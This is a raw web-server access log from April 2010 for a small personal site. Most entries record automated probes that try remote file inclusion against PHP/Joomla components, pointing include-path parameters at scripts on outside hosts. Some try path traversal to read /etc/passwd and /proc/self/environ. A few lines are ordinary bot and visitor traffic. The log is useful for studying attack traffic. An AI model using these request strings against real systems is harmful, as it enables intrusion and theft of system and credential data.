119.235.18.81 - - [23/Apr/2010:10:03:55 -0500] "GET /logs/access_log.1263340800/include/new-visitor.inc.php?lvc_include_dir=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.241.251.224 - - [23/Apr/2010:10:05:51 -0500] "GET /logs/access_log.1219708800/joomla/index.php?option=com_restaurante&task=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
207.46.199.196 - - [23/Apr/2010:10:09:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.251.103.3 - - [23/Apr/2010:10:13:07 -0500] "GET /logs//pjsfiles/modify.php?installed_config_file=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
125.251.103.3 - - [23/Apr/2010:10:13:07 -0500] "GET //pjsfiles/modify.php?installed_config_file=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
125.251.103.3 - - [23/Apr/2010:10:13:07 -0500] "GET /logs/access_log.1220054400//pjsfiles/modify.php?installed_config_file=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.195.112.180 - - [23/Apr/2010:10:15:11 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [23/Apr/2010:10:15:11 -0500] "GET /logs/access_log.1183593600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.87 - - [23/Apr/2010:10:22:24 -0500] "GET /logs/access_log.1254441600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.90.205.195 - - [23/Apr/2010:10:24:37 -0500] "GET /artwork/shootingfishinabarrel.png HTTP/1.1" 200 55770 "http://englishpatterns.com/community/240""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
207.46.13.92 - - [23/Apr/2010:10:27:54 -0500] "GET /logs/access_log.1155686400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.217.216.132 - - [23/Apr/2010:10:29:44 -0500] "GET /include.php?path=psp/user.php&site=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:10:29:45 -0500] "GET /logs/include.php?path=psp/user.php&site=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:10:29:52 -0500] "GET /logs/access_log.1262476800/include.php?path=psp/user.php&site=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:31:12 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:31:12 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:31:12 -0500] "GET /logs/access_log.1219708800%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:31:20 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:31:20 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:31:20 -0500] "GET /logs/access_log.1219708800%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
67.195.112.180 - - [23/Apr/2010:10:34:44 -0500] "GET /logs/ HTTP/1.0" 200 2825 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
164.77.228.200 - - [23/Apr/2010:10:34:49 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:34:49 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:34:49 -0500] "GET /logs/access_log.1212105600//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:35:04 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:35:04 -0500] "GET /logs/access_log.1212105600//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:35:04 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
71.13.68.126 - - [23/Apr/2010:10:36:09 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&client=safari&rls=en&ndsp=20&q=vintage+tattoos&start=20&sa=N""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:09 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:17 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:17 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:17 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:18 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:18 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:18 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:18 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:18 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:18 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:18 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
71.13.68.126 - - [23/Apr/2010:10:36:18 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
67.195.112.180 - - [23/Apr/2010:10:36:38 -0500] "GET /logs/access_log.1271635200 HTTP/1.0" 200 643612 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.48 - - [23/Apr/2010:10:37:24 -0500] "GET /logs/access_log.1196121600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [23/Apr/2010:10:37:31 -0500] "GET /logs/access_log.1156550400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.241.251.224 - - [23/Apr/2010:10:37:34 -0500] "GET /logs//index.php?option=com_weblinks&&mosConfig.absolute.path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.241.251.224 - - [23/Apr/2010:10:37:34 -0500] "GET /logs/access_log.1266019200//index.php?option=com_weblinks&&mosConfig.absolute.path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.241.251.224 - - [23/Apr/2010:10:37:34 -0500] "GET //index.php?option=com_weblinks&&mosConfig.absolute.path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.241.251.224 - - [23/Apr/2010:10:37:35 -0500] "GET /logs/access_log.1265760000//index.php?option=com_weblinks&&mosConfig.absolute.path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.241.251.224 - - [23/Apr/2010:10:37:35 -0500] "GET /logs/access_log.1265241600//index.php?option=com_weblinks&&mosConfig.absolute.path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.241.251.224 - - [23/Apr/2010:10:39:31 -0500] "GET /logs/access_log.1265932800//index.php?option=com_weblinks&&mosConfig.absolute.path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.63.9.246 - - [23/Apr/2010:10:40:36 -0500] "GET /?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
74.63.9.246 - - [23/Apr/2010:10:40:36 -0500] "GET /logs/?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 200 2837 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:40:38 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:40:38 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:40:38 -0500] "GET /logs/access_log.1212105600%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
74.63.9.246 - - [23/Apr/2010:10:40:39 -0500] "GET /logs/access_log.1219708800/?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:40:45 -0500] "GET /logs/access_log.1212105600%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:40:45 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:40:45 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
207.46.199.40 - - [23/Apr/2010:10:40:54 -0500] "GET /logs/access_log.1164240000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [23/Apr/2010:10:42:27 -0500] "GET //_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:27 -0500] "GET /logs//_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:28 -0500] "GET /logs/access_log.1264896000//_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:30 -0500] "GET /logs//_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:30 -0500] "GET /logs/access_log.1264896000//_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:30 -0500] "GET //_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
207.46.13.43 - - [23/Apr/2010:10:42:54 -0500] "GET /logs/access_log.1255564800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [23/Apr/2010:10:42:56 -0500] "GET /logs//_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:56 -0500] "GET /logs/access_log.1264896000//_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:56 -0500] "GET //_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:57 -0500] "GET /logs//_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:57 -0500] "GET /logs/access_log.1264896000//_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:10:42:58 -0500] "GET //_conf/core/common-tpl-vars.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.205.74.152 - - [23/Apr/2010:10:43:22 -0500] "GET /logs/access_log.1263168000//zufallscodepart.php?phpbb_root_path=http://gonapus.net/zero/icon/3?%0D? HTTP/1.1" 404 331 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.205.74.152 - - [23/Apr/2010:10:43:22 -0500] "GET /logs//zufallscodepart.php?phpbb_root_path=http://gonapus.net/zero/icon/3?%0D? HTTP/1.1" 404 309 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.205.74.152 - - [23/Apr/2010:10:43:22 -0500] "GET //zufallscodepart.php?phpbb_root_path=http://gonapus.net/zero/icon/3?%0D? HTTP/1.1" 404 304 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
77.221.130.2 - - [23/Apr/2010:10:43:22 -0500] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.vfc-plauen.de/mobil/361.txt_HACKED? HTTP/1.1" 404 326 "-""Mozilla/5.0"
77.221.130.2 - - [23/Apr/2010:10:43:22 -0500] "GET /logs/access_log.1219363200//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.vfc-plauen.de/mobil/361.txt_HACKED? HTTP/1.1" 404 348 "-""Mozilla/5.0"
77.221.130.2 - - [23/Apr/2010:10:43:22 -0500] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.vfc-plauen.de/mobil/361.txt_HACKED? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.205.74.152 - - [23/Apr/2010:10:43:30 -0500] "GET /logs/access_log.1264464000//zufallscodepart.php?phpbb_root_path=http://gonapus.net/zero/icon/3?%0D? HTTP/1.1" 404 331 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
74.81.84.11 - - [23/Apr/2010:10:44:38 -0500] "GET //index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.81.84.11 - - [23/Apr/2010:10:44:42 -0500] "GET //index.php?option=com_juser&controllers=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
211.174.185.131 - - [23/Apr/2010:10:44:55 -0500] "GET ///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
75.149.214.226 - - [23/Apr/2010:10:45:08 -0500] "GET //delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
75.149.214.226 - - [23/Apr/2010:10:45:27 -0500] "GET //delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
164.77.228.200 - - [23/Apr/2010:10:45:29 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:45:29 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:45:29 -0500] "GET /logs/access_log.1212105600//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:46:01 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:46:01 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
164.77.228.200 - - [23/Apr/2010:10:46:01 -0500] "GET /logs/access_log.1212105600//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://arx.110mb.com/z1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.195.112.180 - - [23/Apr/2010:10:46:24 -0500] "GET /logs/access_log.1271808000 HTTP/1.0" 200 676471 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.251.103.3 - - [23/Apr/2010:10:47:36 -0500] "GET ///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
75.149.214.226 - - [23/Apr/2010:10:47:39 -0500] "GET //delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
75.149.214.226 - - [23/Apr/2010:10:47:49 -0500] "GET //delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
121.190.102.21 - - [23/Apr/2010:10:49:36 -0500] "GET /logs/access_log.1208044800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:10:49:36 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:10:49:36 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:10:49:41 -0500] "GET /logs/access_log.1225238400//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:10:49:42 -0500] "GET /logs/access_log.1208044800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:10:49:42 -0500] "GET /logs/access_log.1225238400//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:10:49:43 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:10:49:43 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:10:50:28 -0500] "GET /include.php?path=psp/user.php&site=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:10:50:28 -0500] "GET /logs/include.php?path=psp/user.php&site=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
118.217.216.132 - - [23/Apr/2010:10:50:28 -0500] "GET /logs/access_log.1262476800/include.php?path=psp/user.php&site=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
210.109.97.196 - - [23/Apr/2010:10:51:09 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.empcl.org/Scripts/bogel/id1.txt?????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
210.109.97.196 - - [23/Apr/2010:10:51:14 -0500] "GET /logs/access_log.1219708800///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.empcl.org/Scripts/bogel/id1.txt?????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
210.109.97.196 - - [23/Apr/2010:10:51:14 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.empcl.org/Scripts/bogel/id1.txt?????? HTTP/1.1" 404 341 "-""Mozilla/5.0"
210.109.97.196 - - [23/Apr/2010:10:56:10 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.empcl.org/Scripts/bogel/id1.txt?????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
210.109.97.196 - - [23/Apr/2010:10:56:18 -0500] "GET /logs/access_log.1219708800///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.empcl.org/Scripts/bogel/id1.txt?????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
210.109.97.196 - - [23/Apr/2010:10:56:18 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.empcl.org/Scripts/bogel/id1.txt?????? HTTP/1.1" 404 341 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:34 -0500] "GET //votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:34 -0500] "GET /logs//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:34 -0500] "GET //votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:34 -0500] "GET /logs/access_log.1271030400//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:10:56:35 -0500] "GET //index.php?option=com_bsq_sitestats&i/wow.raids.free.fr//index.php?option=com_bsq_sitestats&mosConfig.absolute.path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
